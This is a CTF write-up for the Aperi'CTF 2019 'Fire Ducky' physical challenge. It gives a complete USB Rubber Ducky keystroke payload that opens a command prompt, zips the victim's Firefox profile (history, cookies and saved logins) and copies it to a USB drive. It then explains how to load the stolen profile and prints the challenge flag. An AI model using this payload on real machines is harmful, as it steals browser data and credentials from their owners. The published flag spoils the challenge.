+++
title = "Fire Ducky"
description = "Aperi'CTF 2019 - Physical (175 pts)"
keywords = "Physical, Rubber, Ducky, HID, Firefox, Profile, WriteUp, CTF, Aperi'Kube, Apéri'Kube, AperiKube, ApériKube"
date = "2019-09-14T00:00:00+02:00"
weight = 20
draft = false
bref = "Aperi'CTF 2019 - Physical (175 pts)"
toc = true
+++

# Aperi'CTF 2019 - Fire Ducky

### Challenge details

| Event                    | Challenge  | Category | Points | Solves      |
|--------------------------|------------|----------|--------|-------------|
| Aperi'CTF 2019           | Fire Ducky | Physical | 175    | ???         |

L'utilisateur du PC ducky semble avoir une activité suspecte sur son navigateur. Investiguez.
L'exfiltration des données peut se faire à l'aide d'une clé USB classique (montage D:// par default) uniquement.
Le flag respecte le format APRK{...}.

### TL;DR
Dump Mozilla FireFox profile with Rubber Ducky and 7z:
`7z a mysecretprofile.zip %AppData%\Mozilla\Firefox\Profiles`

### Methodology

According to the challenge name, the navigator should be FireFox. In order to investigate, we will dump the Firefox profile. By default, FireFox profile is located at the following location: `%AppData%\Mozilla\Firefox\Profiles`.

Since FireFox profiles are folders, we'll use the command `7z a mysecretprofile.zip %AppData%\Mozilla\Firefox\Profiles` to create a zip file of the folder containing profiles. We will create the archive file in `%Temp%` and move it to `D:\\`.

Here is the final ducky payload (note the pause due to zip compression):

```python
DELAY 3000
GUI r
DELAY 1000
STRING cmd
ENTER
DELAY 1000
STRING cd %Temp%
ENTER
DELAY 1000
STRING 7z a mysecretprofile.zip %AppData%\Mozilla\Firefox\Profiles
ENTER
DELAY 30000
STRING xcopy "mysecretprofile.zip" "D:\"
ENTER
```

After that, we plug out the two key and investigate on `mysecretprofile.zip`. For this I decided to load the profile. Paste the `v0t6ebj3.default-release` folder on your profiles folder (on debian: `~/.mozilla/firefox`). Then close Firefox, edit profiles.ini (keep a copy of the original profiles.ini file):

```bash
[Profile0]
Name=Ducky
IsRelative=1
Path=v0t6ebj3.default-release
Default=1
```

Launch Firefox:

<center><img src="/img/aperictf_2019/fire_ducky/profile.png" alt="profile.png"/></center><br>

Then look at the history:

<center><img src="/img/aperictf_2019/fire_ducky/history.png" alt="history.png"/></center><br>

#### Flag

`APRK{Rubb3r_C0o0o0oK!E}`

[Zeecka](https://twitter.com/Zeecka_)
